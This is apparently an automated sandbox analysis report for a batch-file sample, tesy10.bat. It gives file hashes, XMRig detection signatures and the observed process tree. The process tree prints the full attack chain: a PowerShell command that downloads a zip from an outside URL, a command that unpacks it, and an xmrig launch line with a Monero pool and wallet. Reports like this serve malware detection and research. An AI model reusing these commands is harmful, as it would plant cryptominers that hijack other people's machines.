Overview
overview
10Static
static
1tesy1.bat
windows10-1703-x64
10tesy10.bat
windows10-1703-x64
10tesy11.bat
windows10-1703-x64
10tesy12.bat
windows10-1703-x64
10tesy2.bat
windows10-1703-x64
10tesy3.bat
windows10-1703-x64
10tesy4.bat
windows10-1703-x64
10tesy5.bat
windows10-1703-x64
10tesy6.bat
windows10-1703-x64
10tesy7.bat
windows10-1703-x64
10tesy8.bat
windows10-1703-x64
10tesy9.bat
windows10-1703-x64
10Analysis
-
max time kernel
1794s -
max time network
1806s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system -
submitted
03-07-2023 23:32
Static task
static1
Behavioral task
behavioral1
Sample
tesy1.bat
Resource
win10-20230703-en
Behavioral task
behavioral2
Sample
tesy10.bat
Resource
win10-20230703-en
Behavioral task
behavioral3
Sample
tesy11.bat
Resource
win10-20230703-en
Behavioral task
behavioral4
Sample
tesy12.bat
Resource
win10-20230703-en
Behavioral task
behavioral5
Sample
tesy2.bat
Resource
win10-20230703-en
Behavioral task
behavioral6
Sample
tesy3.bat
Resource
win10-20230703-en
Behavioral task
behavioral7
Sample
tesy4.bat
Resource
win10-20230703-en
Behavioral task
behavioral8
Sample
tesy5.bat
Resource
win10-20230703-en
Behavioral task
behavioral9
Sample
tesy6.bat
Resource
win10-20230703-en
Behavioral task
behavioral10
Sample
tesy7.bat
Resource
win10-20230703-en
Behavioral task
behavioral11
Sample
tesy8.bat
Resource
win10-20230703-en
General
-
Target
tesy10.bat
-
Size
700B
-
MD5
185a2d7bf8c479e47ed8e1ef2cffe6a3
-
SHA1
810436c92e9eb0c3ef0f6867e938b314f85f43c0
-
SHA256
e5aaa6de5373b002a54ae2cce47c384f11a80e66b03531b98e8eff1a8dd79581
-
SHA512
9f1fad5e2a66d6e3d8645ce6c4614fe65ccd169dfa7f78fa3ada228bd543fa7c3dadc384d839d063b66887207897226c57dc62bfb8458ba65614f153791c44bd
Malware Config
Extracted
https://cdn.nest.rip/uploads/126d1e0b-e170-4964-b710-93ec152ec8c9.zip
Signatures
-
XMRig Miner payload 64 IoCs
resource yara_rule behavioral2/files/0x000600000001afc8-220.dat family_xmrig behavioral2/files/0x000600000001afc8-220.dat xmrig behavioral2/memory/3560-223-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-226-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-229-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-230-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-231-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-232-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-233-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-234-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-235-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-236-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-237-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-238-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-239-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-240-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-241-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-242-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-243-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-244-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-245-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-246-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-247-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-248-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-249-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-250-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-251-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-252-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-253-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-254-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-255-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-256-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-257-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-258-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-259-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-260-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-261-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-262-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-263-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-264-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-265-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-266-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-267-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-268-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-269-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-270-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-271-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-272-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-273-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-274-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-275-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-276-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-277-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-278-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-279-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-280-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-281-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-282-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-283-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-284-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-285-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-286-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-287-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig behavioral2/memory/3560-288-0x00007FF630CE0000-0x00007FF6317E3000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 2 4424 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3560 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 752 powershell.exe 752 powershell.exe 752 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 632 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4424 powershell.exe Token: SeDebugPrivilege 752 powershell.exe Token: SeLockMemoryPrivilege 3560 xmrig.exe Token: SeLockMemoryPrivilege 3560 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3560 xmrig.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4980 wrote to memory of 4424 4980 cmd.exe 71 PID 4980 wrote to memory of 4424 4980 cmd.exe 71 PID 4980 wrote to memory of 752 4980 cmd.exe 72 PID 4980 wrote to memory of 752 4980 cmd.exe 72 PID 4980 wrote to memory of 2192 4980 cmd.exe 73 PID 4980 wrote to memory of 2192 4980 cmd.exe 73 PID 2192 wrote to memory of 3560 2192 cmd.exe 75 PID 2192 wrote to memory of 3560 2192 cmd.exe 75
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy10.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/126d1e0b-e170-4964-b710-93ec152ec8c9.zip', 'test.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'test.zip' -DestinationPath '.'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K start.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\xmrig.exexmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 4AifziM6zLv4yV4tpjL9S7joqqMjRkCNQakDCxupKLiiVRmPg8pd2aVRPNo5tVZ2BhSdhadzda7V8EuHuWY3xpq2SCZ28HY.alt -p x3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3560
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD541337a94eee3d213a4e78105e93265ed
SHA1a97cd5e6f1886de16aa7122d716361472c8b92e2
SHA256914fee8f0bf923b3b160a5b6b735113169d7a1f0e86a292f8c0822e0316b6555
SHA512d16f0289bba5235b85f357612f0df0568c083242717a52419435a869dc90fd9fce02c0afdd6a7ab8b021e778b131afc85b963a268690c8e0f60240bc3312f841
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3.2MB
MD5bf4229c027030eeea0db49d10248181d
SHA14d8291b1dd4d3ef3279cc4189d2ddfc88c1e3dad
SHA25625fb70772bc5772ceefac7ebd9dbc684f4235c98f8d357f9001736adbfc6b5ba
SHA512204c60a8f428c7ac3d07f90e678dae91410c5e9d919820748b45b62526146b03386b3c026da208fc8136df6cb19c61e0d1537f2bfee3032836a41165018acd4c
-
Filesize
187B
MD5afb477de9747aa1571a5525e94bf2a4f
SHA182ac5daaeacd7b0814725c7f01f5464b24e2e000
SHA25643e47a94bf314751868298f703f4f8641764918e683e37ee6fc8110f4dd61c0b
SHA5127240cd0fecf838210afb8c2e06672181e1002b134b2c44a69c80aa6ccd30f36911670fe234d95f9a508b83cc8bdaf3d8b28029a7d55b3b8a4e1afaa6dd2d1997
-
Filesize
7.9MB
MD54813fa6d610e180b097eae0ce636d2aa
SHA11e9cd17ea32af1337dd9a664431c809dd8a64d76
SHA2569ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc
SHA5125463e61b9583dd7e73fc4c0f14252ce06bb1b24637fdf5c4b96b3452cf486b147c980e365ca6633d89e7cfe245131f528a7ecab2340251cef11cdeb49dac36aa